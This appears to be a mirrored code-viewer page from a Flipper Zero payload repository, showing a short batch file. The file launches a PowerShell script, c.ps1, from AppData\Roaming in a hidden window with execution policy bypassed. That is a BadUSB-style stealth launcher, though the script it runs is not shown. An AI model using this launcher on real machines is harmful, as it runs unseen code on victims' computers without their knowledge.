mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2025-03-03 17:03:44 +00:00
4 lines
136 B
Batchfile
4 lines
136 B
Batchfile
@echo off
|
|
powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
|
|
pause
|